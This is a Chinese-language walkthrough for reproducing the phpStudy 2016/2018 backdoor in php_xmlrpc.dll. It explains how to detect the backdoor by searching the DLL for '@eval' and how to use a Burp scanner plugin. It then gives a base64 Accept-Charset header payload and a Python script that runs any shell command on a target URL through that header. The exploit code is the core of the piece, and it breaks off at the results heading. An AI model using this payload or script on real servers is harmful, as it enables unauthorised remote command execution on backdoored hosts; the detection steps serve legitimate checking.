phpstudy后门-插件、环境、复现

1.1 后门检测

影响：

phpstudy 2016 php5.4
phpstudy2018 php-5.2.17和php-5.4.45

位置：

通过分析，后门代码存在于\ext\php_xmlrpc.dll模块中
phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl

用记事本打开此文件查找@eval，文件存在@eval(%s(’%s’))证明漏洞存在我这个是phpstudy2018

1.2 环境下载

相关链接：

https://mp.weixin.qq.com/s/G-NnJSNfK6rORmbseMclEw

burp插件下载地址：

https://github.com/gh0stkey/BurpSuite-Extender-phpStudy-Backdoor-Scanner

jython下载地址：

http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar

1.3 插件安装

burp配置python环境；

添加burp插件扫描脚本；

1.4 漏洞验证

利用burp插件进行扫描：
访问有漏洞的网站，可以成功扫描到后门漏洞。

抓包验证，获取权限：

1.5 payload：

Accept-Charset: ZWNobyBleGVjKCd3aG9hbWknKTs=
base64加密：
echo exec('whoami');

1.6 利用脚本

#coding:utf-8
import requests
import base64
import sys

def main(url,command):
	headers={
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0',
	'Accept-Encoding': 'gzip,deflate', #注意这个空格，如果存在空格则执行不成功
	'accept-charset':'%s' % base64.b64encode(command),
	'Connection': 'close',
}
	r = requests.get(url=sys.argv[1],headers=headers).content
	print r

def Usage():
	print "python %s http://127.0.0.1 whoami" % sys.argv[0]

if __name__ == '__main__':
	try:
		url = sys.argv[1]
		rce ="system('%s');" % sys.argv[2]
		main(url,rce)
	except:
		Usage()

利用结果：